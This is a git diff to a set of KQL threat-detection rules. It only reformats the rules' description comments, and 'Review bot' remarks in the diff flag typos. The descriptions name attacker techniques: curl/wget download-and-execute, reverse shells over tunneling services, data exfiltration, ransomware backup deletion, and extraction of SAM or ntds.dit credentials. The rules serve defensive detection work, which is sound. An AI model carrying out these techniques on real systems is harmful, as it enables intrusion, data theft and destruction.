diff --git a/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql b/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql
index 3cab475f..5e7fe91b 100644
--- a/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql
+++ b/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql
@@ -3,8 +3,7 @@
 // Date: 2020-10-13
 // Level: medium
 // Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.
-Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
-
+// Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127
 // False Positives:
diff --git a/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql b/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql
index 92c83621..8827aa3e 100644
--- a/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql
+++ b/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql
@@ -3,8 +3,7 @@
 // Date: 2025-05-22
 // Level: low
 // Description: Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing it's own malicious DLL.
-This behavior may indicate an attempt to execute remotely hosted, potentially malicious files through deno.
-
+// This behavior may indicate an attempt to execute remotely hosted, potentially malicious files through deno.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1204, attack.t1059.007, attack.command-and-control, attack.t1105
 // False Positives:
diff --git a/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql b/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql
index 2d79b7c4..764a41bf 100644
--- a/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql
+++ b/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql
@@ -3,10 +3,9 @@
 // Date: 2025-06-17
 // Level: high
 // Description: Detects suspicious use of command-line tools such as curl or wget to download remote
-content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by
-immediate execution, indicating potential malicious activity. This pattern is commonly used
-by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
-
+// content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by
+// immediate execution, indicating potential malicious activity. This pattern is commonly used
+// by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059.004, attack.t1203
 // False Positives:
diff --git a/KQL/rules/Execution/suspicious_electron_application_child_processes.kql b/KQL/rules/Execution/suspicious_electron_application_child_processes.kql
index ef5c9fd1..bacdf833 100644
--- a/KQL/rules/Execution/suspicious_electron_application_child_processes.kql
+++ b/KQL/rules/Execution/suspicious_electron_application_child_processes.kql
@@ -3,7 +3,6 @@
 // Date: 2022-10-21
 // Level: medium
 // Description: Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
-
 // MITRE Tactic: Execution
 // Tags: attack.execution
diff --git a/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql b/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql
index ed3f28b8..012aac26 100644
--- a/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql
+++ b/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql
@@ -3,9 +3,8 @@
 // Date: 2025-11-04
 // Level: high
 // Description: Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection.
-ClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar.
-The victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view.
-
+// ClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar.
+// The victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010
diff --git a/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql b/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql
index 193d7064..7806dd0d 100644
--- a/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql
+++ b/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql
@@ -3,8 +3,7 @@
 // Date: 2024-09-02
 // Level: high
 // Description: Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function.
-This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
-
+// This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059
diff --git a/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql b/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql
index caa45b9c..063c5e3f 100644
--- a/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql
+++ b/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql
@@ -3,7 +3,6 @@
 // Date: 2025-01-18
 // Level: high
 // Description: Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059, attack.t1203
diff --git a/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql b/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql
index 9fc8ff46..ed803c53 100644
--- a/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql
+++ b/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql
@@ -3,7 +3,6 @@
 // Date: 2025-11-04
 // Level: high
 // Description: Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using clickfix techniques to hide malicious commands in the Windows Run dialog box from naked eyes.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010
 // False Positives:
diff --git a/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql b/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql
index 41f0eae7..0665c764 100644
--- a/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql
+++ b/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql
@@ -3,7 +3,6 @@
 // Date: 2025-11-04
 // Level: high
 // Description: Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010
 // False Positives:
diff --git a/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql
index 5c5cb7fd..413f2168 100644
--- a/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql
+++ b/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql
@@ -3,9 +3,8 @@
 // Date: 2024-02-02
 // Level: medium
 // Description: An adversary might use WMI to discover information about the system, such as the volume name, size,
-free space, and other disk information. This can be done using the 'wmic' command-line utility and has been
-observed being used by threat actors such as Volt Typhoon.
-
+// free space, and other disk information. This can be done using the 'wmic' command-line utility and has been
+// observed being used by threat actors such as Volt Typhoon.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.discovery, attack.t1047, attack.t1082
diff --git a/KQL/rules/Execution/use_of_fsharp_interpreters.kql b/KQL/rules/Execution/use_of_fsharp_interpreters.kql
index b467cacc..d49fc8e5 100644
--- a/KQL/rules/Execution/use_of_fsharp_interpreters.kql
+++ b/KQL/rules/Execution/use_of_fsharp_interpreters.kql
@@ -3,8 +3,7 @@
 // Date: 2022-06-02
 // Level: medium
 // Description: Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe"
-Both can be used for AWL bypass and to execute F# code via scripts or inline.
-
+// Both can be used for AWL bypass and to execute F# code via scripts or inline.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059
 // False Positives:
diff --git a/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql b/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql
index 9fc9c3c8..ab9c6fc9 100644
--- a/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql
+++ b/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql
@@ -3,8 +3,7 @@
 // Date: 2023-11-26
 // Level: high
 // Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.
-Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges.
-
+// Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges.
 // MITRE Tactic: Execution
 // Tags: attack.execution
diff --git a/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql b/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql
index eda1204f..059a5181 100644
--- a/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql
+++ b/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql
@@ -3,9 +3,8 @@
 // Date: 2021-11-26
 // Level: medium
 // Description: Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender.
-Users can configure different pilot collections for each of the co-management workloads.
-It can be abused by attackers in order to upload or download files.
-
+// Users can configure different pilot collections for each of the co-management workloads.
+// It can be abused by attackers in order to upload or download files.
 // MITRE Tactic: Exfiltration
 // Tags: attack.exfiltration, attack.t1567
diff --git a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql
index e96ef768..1f8f07f6 100644
--- a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql
+++ b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql
@@ -3,9 +3,8 @@
 // Date: 2022-11-03
 // Level: high
 // Description: Detects an executable initiating a network connection to "ngrok" tunneling domains.
-Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
-While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
-
+// Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
+// While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
 // MITRE Tactic: Exfiltration
 // Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508
 // False Positives:
diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql
index 33cf9a91..88eeb015 100644
--- a/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql
+++ b/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql
@@ -3,8 +3,7 @@
 // Date: 2024-09-13
 // Level: medium
 // Description: Detects network connections to BTunnels domains initiated by a process on the system.
-Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
-
+// Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
 // MITRE Tactic: Exfiltration
 // Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572
 // False Positives:
diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql
index 78fc2960..bc91a970 100644
--- a/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql
+++ b/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql
@@ -3,8 +3,7 @@
 // Date: 2024-05-27
 // Level: medium
 // Description: Detects network connections to Cloudflared tunnels domains initiated by a process on the system.
-Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
-
+// Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
 // MITRE Tactic: Exfiltration
 // Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572
 // False Positives:
diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql
index f415abb5..5999853b 100644
--- a/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql
+++ b/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql
@@ -3,7 +3,6 @@
 // Date: 2023-11-20
 // Level: medium
 // Description: Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
-
 // MITRE Tactic: Exfiltration
 // Tags: attack.exfiltration, attack.command-and-control, attack.t1567.001, attack.t1572
 // False Positives:
diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql
index af4e15e6..d218d981 100644
--- a/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql
+++ b/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql
@@ -3,8 +3,7 @@
 // Date: 2021-12-06
 // Level: low
 // Description: Detects a network connection initiated by a binary to "api.mega.co.nz".
-Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
-
+// Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
 // MITRE Tactic: Exfiltration
 // Tags: attack.exfiltration, attack.t1567.002
 // False Positives:
diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql
index 4d666698..c0337f00 100644
--- a/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql
+++ b/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql
@@ -3,7 +3,6 @@
 // Date: 2023-11-20
 // Level: medium
 // Description: Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
-
 // MITRE Tactic: Exfiltration
 // Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572
 // False Positives:
diff --git a/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql b/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql
index dcb07426..8ab40157 100644
--- a/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql
+++ b/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql
@@ -3,9 +3,8 @@
 // Date: 2022-07-16
 // Level: high
 // Description: Detects an executable initiating a network connection to "ngrok" domains.
-Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
-While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
-
+// Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
+// While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
 // MITRE Tactic: Exfiltration
 // Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572, attack.t1102
 // False Positives:
diff --git a/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql b/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql
index 7ad87026..185731b4 100644
--- a/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql
+++ b/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql
@@ -3,9 +3,8 @@
 // Date: 2025-10-17
 // Level: high
 // Description: Detects the execution of the Restic backup tool, which can be used for data exfiltration.
-Threat actors may leverage Restic to back up and exfiltrate sensitive data to remote storage locations, including cloud services.
-If not legitimately used in the enterprise environment, its presence may indicate malicious activity.
-
+// Threat actors may leverage Restic to back up and exfiltrate sensitive data to remote storage locations, including cloud services.
+// If not legitimately used in the enterprise environment, its presence may indicate malicious activity.
 // MITRE Tactic: Exfiltration
 // Tags: attack.exfiltration, attack.t1048, attack.t1567.002
 // False Positives:
diff --git a/KQL/rules/Exfiltration/python_webserver_execution_linux.kql b/KQL/rules/Exfiltration/python_webserver_execution_linux.kql
index 023d6cf5..2e97304e 100644
--- a/KQL/rules/Exfiltration/python_webserver_execution_linux.kql
+++ b/KQL/rules/Exfiltration/python_webserver_execution_linux.kql
@@ -3,9 +3,8 @@
 // Date: 2025-10-17
 // Level: medium
 // Description: Detects the execution of Python web servers via command line interface (CLI).
-After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software.
-This technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems.
-
+// After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software.
+// This technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems.
 // MITRE Tactic: Exfiltration
 // Tags: attack.exfiltration, attack.t1048.003
 // False Positives:
diff --git a/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql b/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql
index da3bcea0..5a428f6c 100644
--- a/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql
+++ b/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql
@@ -3,8 +3,7 @@
 // Date: 2022-01-07
 // Level: medium
 // Description: Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
-The data may also be sent to an alternate network location from the main command and control server.
-
+// The data may also be sent to an alternate network location from the main command and control server.
 // MITRE Tactic: Exfiltration
 // Tags: attack.exfiltration, attack.t1048.003
 // False Positives:
diff --git a/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql
index cab4b0a0..ce3cf983 100644
--- a/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql
+++ b/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql
@@ -3,7 +3,6 @@
 // Date: 2023-03-16
 // Level: high
 // Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397
-
 // MITRE Tactic: Exfiltration
 // Tags: attack.exfiltration, attack.t1048.003, cve.2023-23397
diff --git a/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql
index 8651f814..2295277a 100644
--- a/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql
+++ b/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2020-05-02
 // Level: medium
 // Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie".
-This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).
-
+// This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).
 // MITRE Tactic: Exfiltration
 // Tags: attack.exfiltration, attack.t1048.003
diff --git a/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql b/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql
index 6675bce5..06f13399 100644
--- a/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql
+++ b/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql
@@ -3,9 +3,8 @@
 // Date: 2021-12-13
 // Level: high
 // Description: Detects the deletion of all backups or system state backups via "wbadmin.exe".
-This technique is used by numerous ransomware families and actors.
-This may only be successful on server platforms that have Windows Backup enabled.
-
+// This technique is used by numerous ransomware families and actors.
+// This may only be successful on server platforms that have Windows Backup enabled.
 // MITRE Tactic: Impact
 // Tags: attack.impact, attack.t1490
diff --git a/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql b/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql
index 294ac0d8..0fd00424 100644
--- a/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql
+++ b/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql
@@ -3,9 +3,8 @@
 // Date: 2021-12-26
 // Level: medium
 // Description: Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk.
-Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.
-Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives
-
+// Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.
+// Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives
 // MITRE Tactic: Impact
 // Tags: attack.impact, attack.t1485
diff --git a/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql
index ce83ba59..99f2d1d8 100644
--- a/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql
+++ b/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2024-05-10
 // Level: medium
 // Description: Detects the recovery of files from backups via "wbadmin.exe".
-Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.
-
+// Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.
 // MITRE Tactic: Impact
 // Tags: attack.impact, attack.t1490
diff --git a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql
index 4fc05097..ffd88b56 100644
--- a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql
+++ b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql
@@ -3,9 +3,8 @@
 // Date: 2023-11-28
 // Level: high
 // Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.
-This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
-It could also be used for anti-analysis purposes by shut downing specific processes.
-
+// This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
+// It could also be used for anti-analysis purposes by shut downing specific processes.
 // MITRE Tactic: Impact
 // Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001
 // False Positives:
diff --git a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql
index cbe9deb4..6eb12974 100644
--- a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql
+++ b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql
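Review bot: The second added comment line in load_of_rstrtmgr_dll_by_a_suspicious_process.kql carries the wording "by shut downing specific processes" over from the old text; while the commit only adds the missing `//` prefix, this is the moment to fix the phrase, e.g. `// It could also be used for anti-analysis purposes by shutting down specific processes.`. The same line appears verbatim in the next hunk for load_of_rstrtmgr_dll_by_an_uncommon_process.kql and should get the same correction. The rest of each rule file lies outside the hunk.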
@@ -3,9 +3,8 @@
 // Date: 2023-11-28
 // Level: low
 // Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.
-This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
-It could also be used for anti-analysis purposes by shut downing specific processes.
-
+// This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
+// It could also be used for anti-analysis purposes by shut downing specific processes.
 // MITRE Tactic: Impact
 // Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001
 // False Positives:
diff --git a/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql b/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql
index 378dc483..1cf67326 100644
--- a/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql
+++ b/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql
@@ -3,8 +3,7 @@
 // Date: 2024-05-29
 // Level: medium
 // Description: Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility.
-An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.
-
+// An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.
 // MITRE Tactic: Impact
 // Tags: attack.impact, attack.t1490
 // False Positives:
diff --git a/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql b/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql
index 0aaa8b64..44266cf4 100644
--- a/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql
+++ b/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql
@@ -3,7 +3,6 @@
 // Date: 2021-08-09
 // Level: high
 // Description: Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)
-
 // MITRE Tactic: Impact
 // Tags: attack.impact, attack.t1490
 // False Positives:
diff --git a/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql b/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql
index e07291bf..2fb186f4 100644
--- a/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql
+++ b/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql
@@ -3,8 +3,7 @@
 // Date: 2024-05-29
 // Level: medium
 // Description: Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil".
-An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files.
-
+// An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files.
 // MITRE Tactic: Impact
 // Tags: attack.impact, attack.t1490
 // False Positives:
diff --git a/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql b/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql
index 621414cc..f8be93e0 100644
--- a/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql
+++ b/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql
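Review bot: The added comment line in time_machine_backup_deletion_attempt_via_tmutil_macos.kql keeps the misspelling "ransonware" from the old text; since the line is being rewritten anyway, it should read `// An adversary may perform this action before launching a ransomware attack to prevent the victim from restoring their files.`. The misspelling also makes the description harder to find with a text search across the rule set. The rest of the rule file lies outside the hunk.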
@@ -3,8 +3,7 @@
 // Date: 2024-05-29
 // Level: medium
 // Description: Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil".
-An attacker can use this to prevent backups from occurring.
-
+// An attacker can use this to prevent backups from occurring.
 // MITRE Tactic: Impact
 // Tags: attack.impact, attack.t1490
 // False Positives:
diff --git a/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql b/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql
index 50aba8b5..b3b81cb3 100644
--- a/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql
+++ b/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql
@@ -3,9 +3,8 @@
 // Date: 2021-12-13
 // Level: medium
 // Description: Detects the deletion of backups or system state backups via "wbadmin.exe".
-This technique is used by numerous ransomware families and actors.
-This may only be successful on server platforms that have Windows Backup enabled.
-
+// This technique is used by numerous ransomware families and actors.
+// This may only be successful on server platforms that have Windows Backup enabled.
 // MITRE Tactic: Impact
 // Tags: attack.impact, attack.t1490
 // False Positives:
diff --git a/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql b/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql
index 8c12f212..613dd7ff 100644
--- a/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql
+++ b/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql
@@ -3,9 +3,8 @@
 // Date: 2025-07-31
 // Level: medium
